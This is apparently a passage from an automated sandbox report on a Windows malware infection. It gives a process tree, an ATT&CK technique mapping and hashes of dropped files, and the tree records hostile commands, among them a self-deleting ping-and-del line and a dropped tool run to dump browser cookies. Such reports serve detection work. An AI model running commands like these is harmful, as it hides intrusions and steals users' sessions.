                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:5488
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:7412
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:2384
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:6928
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:8640
                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:9256
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies system certificate store
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4580
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                    3⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:9912
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping 127.0.0.1
                                                                                                      4⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:10220
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks whether UAC is enabled
                                                                                                  PID:4208
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  PID:2124
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4352
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3896
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:7000
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6164
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                1⤵
                                                                                                  PID:1452
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                  1⤵
                                                                                                    PID:1356
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                    1⤵
                                                                                                      PID:1212
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                      1⤵
                                                                                                        PID:1152
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        PID:1060
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                        1⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:864
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                          2⤵
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2248
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Modifies registry class
                                                                                                          PID:4212
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4972
                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        PID:10036
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:3352
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        PID:5320
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:5608
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:4968
                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                        1⤵
                                                                                                        • Enumerates connected drives
                                                                                                        • Drops file in Program Files directory
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        PID:7352
                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 9BA159530B98005028ED78F65F9682C0 C
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:8164
                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding FDB7192264F127A98103CDCEB559D156
                                                                                                          2⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Loads dropped DLL
                                                                                                          PID:8680
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                            3⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:8744
                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding DBA0A2119FA6ED0822FE48434E6163E7 E Global\MSI0000
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:9816
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:6536
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:6644
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                        1⤵
                                                                                                          PID:6956
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:6600
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:8788
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:9392

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Persistence

                                                                                                          Registry Run Keys / Startup Folder

                                                                                                          1
                                                                                                          T1060

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Defense Evasion

                                                                                                          Modify Registry

                                                                                                          3
                                                                                                          T1112

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Install Root Certificate

                                                                                                          1
                                                                                                          T1130

                                                                                                          Credential Access

                                                                                                          Credentials in Files

                                                                                                          3
                                                                                                          T1081

                                                                                                          Discovery

                                                                                                          Software Discovery

                                                                                                          1
                                                                                                          T1518

                                                                                                          Query Registry

                                                                                                          4
                                                                                                          T1012

                                                                                                          System Information Discovery

                                                                                                          5
                                                                                                          T1082

                                                                                                          Security Software Discovery

                                                                                                          1
                                                                                                          T1063

                                                                                                          Peripheral Device Discovery

                                                                                                          1
                                                                                                          T1120

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Collection

                                                                                                          Data from Local System

                                                                                                          3
                                                                                                          T1005

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files\Windows Sidebar\TKMRAGWVRI\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\Windows Sidebar\TKMRAGWVRI\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\install.dat
                                                                                                            MD5

                                                                                                            806c3221a013fec9530762750556c332

                                                                                                            SHA1

                                                                                                            36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                            SHA256

                                                                                                            9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                            SHA512

                                                                                                            56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                          • C:\Program Files\install.dll
                                                                                                            MD5

                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                            SHA1

                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                            SHA256

                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                            SHA512

                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\3R6RPKPV.cookie
                                                                                                            MD5

                                                                                                            4be969a37a60101739dd907dc54deb14

                                                                                                            SHA1

                                                                                                            fbd10e333f27d11de06261869165a3fe6b2ab1b6

                                                                                                            SHA256

                                                                                                            538ca2ffe5341d5a9787fc242a489554f9ee68de05f0b7aede0d2a04e1198032

                                                                                                            SHA512

                                                                                                            beb1f4a5c792460eeb420f57380c0565d909cd14140f80c3d7af9733111404f17a729dd7b006d82dd3a9fb834a82322e76ccbcb2a0d4af8b65f05da6a8c1ca8e

                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\9IJ0BAQ0.cookie
                                                                                                            MD5

                                                                                                            5357c5a3d4b018d4620b18d934ebe438

                                                                                                            SHA1

                                                                                                            73b04b82ba56de412f0bf6ffcc336822b7a7e2a6

                                                                                                            SHA256

                                                                                                            56345361661ffec73be20969b4841983d85cac948222f289e0fb28b96e7e1635

                                                                                                            SHA512

                                                                                                            46d2f1ef5890944c4d9c3d8c8f2fce1630e2cd38daad3147ccb8b8faee6dd7766dc88f9cb21338a7ef59b4d15517643caff6580f265b832351e4f5d38e1ee714

                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\DND5H3J1.cookie
                                                                                                            MD5

                                                                                                            7cac22b8689118424184b47a212c65ec

                                                                                                            SHA1

                                                                                                            ff2c79c7a4b6ab4b397addb6dca46a46c11ce889

                                                                                                            SHA256

                                                                                                            7cfd9eecbdc580702bab66d9566d07a43249bdb278ee694ac19c169a82753570

                                                                                                            SHA512

                                                                                                            9c0d4c8406cb390b80c3bd3b88b914d9b7f3b05b8bd093a0245fd238e5003a8e44c12fb9ed01bea5f1ef86cdce9aed1faf35b7c4a6173306826e70b5cf961feb

                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\RYQO3JRY.cookie
                                                                                                            MD5

                                                                                                            b53f7349bcc99c6cdaa13b89757ba474

                                                                                                            SHA1

                                                                                                            4ec8b99a13e902663eafa32b89a617c36e9afdab

                                                                                                            SHA256

                                                                                                            28b2fcc0137844d0b1e79b5dc8f25b14f3738e7bd31c1cb427f31911097b478f

                                                                                                            SHA512

                                                                                                            dab305642265c84d67bc8714139d3c97262968fb95cf60856c4f05912bdfb25760340d3225e56f582dd139186a1ceebd9851ad40ea11644214b056f3acb2dee8

                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                            MD5

                                                                                                            fa08f6463ef7be976f91339d5c800cd3

                                                                                                            SHA1

                                                                                                            8f179db874997b62c87d6da487a4b3a4db332a50

                                                                                                            SHA256

                                                                                                            c9b2bbc388046f9e34ce5b00e7624956916650f0b4cc4db3ce9f3ee2fb024af3

                                                                                                            SHA512

                                                                                                            80424f97f0a2b9244a378c0713de0143e7c9165a6545d706c162b6b0554b4c7d012f1f99668b6d1edf098a7190b456307e7ff88241c61c5dbad39b58369faaf3

                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                            MD5

                                                                                                            1508eda363d0cd01623b416f0cb9767c

                                                                                                            SHA1

                                                                                                            669183c0805df94bc7dfb40cd98d30e3e99e7430

                                                                                                            SHA256

                                                                                                            a5317a0789174db61cda810a0cb99483732693b55ff8730861d0f6175227572b

                                                                                                            SHA512

                                                                                                            196d3aa1e2a7ae2d317095fd9c7b60c1874e568fce3536b97d114b5a9a4d2c875daa117fdbeda1ada78d8c05927d9ab81e5f077bc356b8c914a9d294b2397d21

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0yidj5gt.5xh\KiffMainE1.exe
                                                                                                            MD5

                                                                                                            9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                            SHA1

                                                                                                            9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                            SHA256

                                                                                                            bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                            SHA512

                                                                                                            0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0yidj5gt.5xh\KiffMainE1.exe
                                                                                                            MD5

                                                                                                            9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                            SHA1

                                                                                                            9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                            SHA256

                                                                                                            bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                            SHA512

                                                                                                            0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1574296099.exe
                                                                                                            MD5

                                                                                                            85e328827c414eb090a0aecdd27dbb5f

                                                                                                            SHA1

                                                                                                            c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                            SHA256

                                                                                                            84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                            SHA512

                                                                                                            fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1574296099.exe
                                                                                                            MD5

                                                                                                            85e328827c414eb090a0aecdd27dbb5f

                                                                                                            SHA1

                                                                                                            c6ffbde2ae087e2b3a69fd5c005e885fd620a2fc

                                                                                                            SHA256

                                                                                                            84ed0a9eae64ed1cdf1310a3ef4fbc88620ce5f59c6f14f4591f5897e82e07e4

                                                                                                            SHA512

                                                                                                            fe40e19454a690c69cec1d361d3829cb4ca6b08c3ef05786d11c1249be3d94718f2c2315386630b8365a73d4e700065504cca56c60eb7cccf8351b45231ceefd

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1yfsyrul.sjl\setup.exe
                                                                                                            MD5

                                                                                                            4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                                            SHA1

                                                                                                            c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                                            SHA256

                                                                                                            6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                                            SHA512

                                                                                                            0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\369263966.exe
                                                                                                            MD5

                                                                                                            15cb520fa8ff50d88f76a8c8ece324e5

                                                                                                            SHA1

                                                                                                            2a93c5057059ceb9cb3a52b0101d304a6cff1c23

                                                                                                            SHA256

                                                                                                            9a197b91a20212d816635aff696ea5797bba377b8651a83946e0e26b6e443479

                                                                                                            SHA512

                                                                                                            c1fbafda9146afabf4ced5a9797213b527cee07bd42be256607fac8cebc41316764942b5cafb793d3cd43a2dcbed9de0327c30f1b574e83ce85aa910f1e0befb

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\369263966.exe
                                                                                                            MD5

                                                                                                            15cb520fa8ff50d88f76a8c8ece324e5

                                                                                                            SHA1

                                                                                                            2a93c5057059ceb9cb3a52b0101d304a6cff1c23

                                                                                                            SHA256

                                                                                                            9a197b91a20212d816635aff696ea5797bba377b8651a83946e0e26b6e443479

                                                                                                            SHA512

                                                                                                            c1fbafda9146afabf4ced5a9797213b527cee07bd42be256607fac8cebc41316764942b5cafb793d3cd43a2dcbed9de0327c30f1b574e83ce85aa910f1e0befb

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\44-d96ca-5b4-545a6-b6f4acd66ecfe\Podygefofu.exe
                                                                                                            MD5

                                                                                                            ffbe9ff871f978e3d0e556e0e7d22c39

                                                                                                            SHA1

                                                                                                            cbc299a20c80e0f2e7d54cd53acca2efec694f70

                                                                                                            SHA256

                                                                                                            bd652e421242ae91f652aa236c7fc3202e9f691d1e0b351c1b5e1211481899cd

                                                                                                            SHA512

                                                                                                            4f2b6aef5128c43f94e27326f8e53e0b9d46ca1b698999575ac8d5368d49d8a529601ca58ba84c01bf2f48830da9e58ea05ff5a93bfb4eb6bb59755239da989c

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\44-d96ca-5b4-545a6-b6f4acd66ecfe\Podygefofu.exe
                                                                                                            MD5

                                                                                                            ffbe9ff871f978e3d0e556e0e7d22c39

                                                                                                            SHA1

                                                                                                            cbc299a20c80e0f2e7d54cd53acca2efec694f70

                                                                                                            SHA256

                                                                                                            bd652e421242ae91f652aa236c7fc3202e9f691d1e0b351c1b5e1211481899cd

                                                                                                            SHA512

                                                                                                            4f2b6aef5128c43f94e27326f8e53e0b9d46ca1b698999575ac8d5368d49d8a529601ca58ba84c01bf2f48830da9e58ea05ff5a93bfb4eb6bb59755239da989c

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\44-d96ca-5b4-545a6-b6f4acd66ecfe\Podygefofu.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\62-95a23-a62-bdfaa-b5059440d6d1e\Kenessey.txt
                                                                                                            MD5

                                                                                                            97384261b8bbf966df16e5ad509922db

                                                                                                            SHA1

                                                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                            SHA256

                                                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                            SHA512

                                                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\62-95a23-a62-bdfaa-b5059440d6d1e\Pubuzhaecezhu.exe
                                                                                                            MD5

                                                                                                            3d941b0fea60cf411176013425a45984

                                                                                                            SHA1

                                                                                                            0a940f0f0579cef5d6cc7099ab8e78f9aae208b1

                                                                                                            SHA256

                                                                                                            65bc09b9a858b11558583f9d5812c8207a97f3b7c0e62caaa98d709affba4e7d

                                                                                                            SHA512

                                                                                                            d4fe2eeda252f6ddfd3712732b162ba7c76bc1af6f87b61a4b1d7dd6f1883b67152882dbf76126a41a8f20bb950a563f395bc73decb3edfe57368466e62fa59d

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\62-95a23-a62-bdfaa-b5059440d6d1e\Pubuzhaecezhu.exe
                                                                                                            MD5

                                                                                                            3d941b0fea60cf411176013425a45984

                                                                                                            SHA1

                                                                                                            0a940f0f0579cef5d6cc7099ab8e78f9aae208b1

                                                                                                            SHA256

                                                                                                            65bc09b9a858b11558583f9d5812c8207a97f3b7c0e62caaa98d709affba4e7d

                                                                                                            SHA512

                                                                                                            d4fe2eeda252f6ddfd3712732b162ba7c76bc1af6f87b61a4b1d7dd6f1883b67152882dbf76126a41a8f20bb950a563f395bc73decb3edfe57368466e62fa59d

